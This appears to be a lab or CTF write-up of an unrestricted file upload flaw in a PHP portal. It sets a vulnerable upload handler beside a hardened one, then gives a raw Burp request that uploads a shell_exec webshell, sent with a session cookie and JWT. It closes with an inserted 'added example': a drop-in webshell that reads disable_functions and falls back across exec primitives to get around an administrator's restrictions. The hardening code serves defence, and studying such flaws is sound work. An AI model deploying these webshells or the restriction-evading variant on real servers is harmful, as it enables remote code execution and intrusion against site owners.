
Unrestricted File Upload

As Paul, we have access to a file upload service that is supposed to accept only zip files.

File upload

From the source code, however, it is clear that there are no upload restrictions at all: neither the file type nor the file name is checked.

Moreover, the name under which the uploaded file is stored comes from the task field, so we control it. Using Burp Suite, we can upload a PHP one-liner that gives remote code execution through a cmd parameter.
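To make the two findings above concrete (no type or name check, and a client-controlled name), here is an added example that is not the application's actual source: a minimal reconstruction of the vulnerable handler pattern next to a hardened one. The field names file and task are taken from the request on this page; the upload directory, size limit and everything else are assumptions.

```php
<?php
// Added example, not the original fileController.php. Field names "file" and
// "task" come from the captured request; paths and limits are assumed.

// --- Vulnerable pattern: trusts the client-supplied name, never looks at content ---
function vulnerable_upload(array $files, array $post, string $uploadDir): string
{
    // The client picks name and extension (and, with no basename(), the directory),
    // so "shell.php" lands inside the webroot and is served as PHP.
    $dest = $uploadDir . '/' . $post['task'];
    move_uploaded_file($files['file']['tmp_name'], $dest);
    return $dest;
}

// --- Hardened: allowlisted extension, magic-byte check, server-chosen name, outside webroot ---
function hardened_upload(array $files, string $uploadDir, int $maxBytes = 10 * 1024 * 1024): string
{
    $f = $files['file'] ?? null;
    if (!$f || $f['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($f['size'] > $maxBytes) {
        throw new RuntimeException('file too large');
    }

    // 1. Extension allowlist on the client name: necessary, but easy to fake, so not sufficient.
    $ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
    if ($ext !== 'zip') {
        throw new RuntimeException('only .zip files are accepted');
    }

    // 2. Check the bytes, not the Content-Type header (the client sets that too).
    //    Local, empty-archive and spanned-archive zip signatures.
    $magic = file_get_contents($f['tmp_name'], false, null, 0, 4);
    if (!in_array($magic, ["PK\x03\x04", "PK\x05\x06", "PK\x07\x08"], true)) {
        throw new RuntimeException('not a zip archive');
    }

    // 3. Never reuse the client name or the "task" field for the path: random name,
    //    fixed extension. Keep the user's label in a database column if it is needed.
    $name = bin2hex(random_bytes(16)) . '.zip';

    // 4. Store outside the document root (assumed path) so nothing uploaded is ever
    //    executed, whatever its extension.
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($f['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

// Usage (assumed directories):
// vulnerable_upload($_FILES, $_POST, '/var/www/html/portal/uploads');
// hardened_upload($_FILES, '/var/lib/portal/uploads');
```

Even with the hardened handler, the web server should be configured to refuse script execution in any directory that holds user content; defense in depth matters here because a single missed check (a double extension, a .phtml, a .htaccess upload) turns a file store back into code execution.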

Upload malicious files

POST /portal/includes/fileController.php HTTP/1.1
Content-Length: 338
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPn
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU
Connection: close

------WebKitFormBoundaryHBZNum5szzVSddPn
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php

<?php echo shell_exec($_GET['cmd']); ?>
------WebKitFormBoundaryHBZNum5szzVSddPn
Content-Disposition: form-data; name="task"


------WebKitFormBoundaryHBZNum5szzVSddPn--

When I first tried the PHP system command, there seemed to be an error when performing the upload. I suspect that system is not allowed by the PHP configuration.

Changing to shell_exec solves the issue.
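Rather than swapping one function for another by trial and error, a webshell can check disable_functions itself and fall back to whichever command-execution primitive the configuration still allows. The following is an added example, not code from the original writeup; it is a drop-in replacement for the one-liner above and uses only standard PHP builtins (ini_get, function_exists, shell_exec, exec, proc_open). Use it only in a lab you are authorised to test.

```php
<?php
// Added example, not from the original writeup: a webshell that picks a working
// exec primitive instead of failing when one of them is in disable_functions.

function blocked(string $fn): bool
{
    // disable_functions is a comma-separated list in php.ini; a disabled function
    // still passes function_exists() on some builds, so check both.
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    return !function_exists($fn) || in_array($fn, $disabled, true);
}

function run(string $cmd): string
{
    if (!blocked('shell_exec')) {
        return (string) shell_exec($cmd . ' 2>&1');
    }
    if (!blocked('exec')) {
        exec($cmd . ' 2>&1', $lines);
        return implode("\n", $lines) . "\n";
    }
    if (!blocked('proc_open')) {
        $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
        $proc = proc_open($cmd, $spec, $pipes);
        if (is_resource($proc)) {
            $out = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
            fclose($pipes[1]);
            fclose($pipes[2]);
            proc_close($proc);
            return $out;
        }
    }
    // Nothing usable: report the policy so the next step (e.g. a different
    // primitive or a bypass for this PHP version) is an informed choice.
    return "no usable exec primitive; disable_functions=" . ini_get('disable_functions') . "\n";
}

header('Content-Type: text/plain');
echo isset($_GET['cmd']) ? run($_GET['cmd']) : "usage: ?cmd=id\n";
```

Upload it the same way as shell.php and call it with ?cmd=id; the first branch that runs tells you which primitive the server permits, and the final message tells you exactly what the administrator blocked when none of them does.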